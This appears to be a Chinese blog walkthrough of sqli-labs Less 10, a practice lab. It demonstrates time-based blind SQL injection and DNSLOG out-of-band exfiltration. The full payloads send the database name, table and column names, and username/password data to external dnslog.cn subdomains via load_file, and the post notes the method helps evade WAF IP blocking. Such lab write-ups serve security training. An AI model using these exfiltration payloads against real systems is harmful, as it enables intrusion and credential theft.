当前位置: 首页 > news >正文

sqli-labs靶场 less 10

文章目录

  • sqli-labs靶场
    • less 10 时间注入,DNSLOG外带


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 (‘、"、’'、“”)
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 10 时间注入,DNSLOG外带

  • 题目类型:

id=1" and sleep(2)–+

判断是双引号闭合,并且是时间注入

在这里插入图片描述


但是由于时间盲注需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP

DNSLOG外带适合 无回显,需要大量盲注导致封ip的情况下使用 (也许你也可以使用代理池

DNSLOG外带注入所需条件?

(root权限,secure_file_priv=,Windows操作系统

1.使用 load_file() 函数,所以需要root权限

2.secure_file_priv 需要为空。

3.并且服务器要为Windows操作系统。

可以使用在线DNSLOG查看dns记录

报库名:
id=1" and (select load_file(concat(‘//’,(select database()),‘.temfqh.dnslog.cn/abc’)))–+
在这里插入图片描述

在这里插入图片描述

报表名:
id=1" and (select load_file(concat(‘//’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),‘.20giws.dnslog.cn/abc.txt’)))–+
在这里插入图片描述

报字段
id=1" and (select load_file(concat(‘//’,(select mid(hex(group_concat(column_name)),1,40) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),‘.20giws.dnslog.cn/a1111’)))–+
在这里插入图片描述
hex解码即可

在这里插入图片描述

报数据
id=1" and (select load_file(concat(‘//’,(select mid(hex(group_concat(username,password)),1,40) from security.users),‘.ou9pxe.dnslog.cn/abc’)))–+

id=1" and (select load_file(concat(‘//’,(select mid(hex(group_concat(username,password)),41,40) from security.users),‘.ou9pxe.dnslog.cn/abc’)))–+

利用mid逐步截取得到完整数据,再拼接进行hex()解码 (分开也行)
在这里插入图片描述
在这里插入图片描述


http://www.dtcms.com/a/99192.html

相关文章:

  • prometheus+grafana监控虚拟机实操
  • Windows 11 VS Code C/C++ 开发环境搭建——一种尽量“绿色”的方法
  • defconfig配置宏的规则
  • C. Assembly via Minimums
  • 一种C# Winform的UI处理
  • Python第六章18:数据容器的通用操作
  • 简单ELK框架搭建
  • 为pip设置国内镜像源
  • Android Jetpack学习总结(源码级理解)
  • 明达IOT 平台助推纺织龙头实现智能管理
  • 动态规划篇(数位统计DP)
  • 用空闲时间做了一个小程序-二维码生成器
  • 【安全】nginx防止host头攻击
  • c++弱指针实现原理
  • Python小练习系列 Vol.5:数独求解(经典回溯 + 剪枝)
  • Linux之基础知识
  • 深度学习处理时间序列(5)
  • 《新凯来:半导体设备制造领域的“国家队”》
  • 【愚公系列】《高效使用DeepSeek》039-政务工作辅助
  • LeetCode 2360.图中的最长环:一步一打卡(不撞南墙不回头) - 通过故事讲道理
  • Redis延时队列在订单超时未报到场景的应用分享
  • 【数据结构】二叉树 — 经典OJ面试题剖析!!!
  • 关于 websocket协议的理解
  • 001 - 前缀和算法:从原理到实战,一文讲透区间和问题
  • 谈谈Minor GC、Major GC和Full GC
  • Java——数组
  • RSA 简介及 C# 和 js 实现【加密知多少系列_4】
  • .NET开发基础知识11-20
  • Lavazza拉瓦萨亮相上海樱花节,增色海派咖啡风情
  • rbpf虚拟机-汇编和反汇编器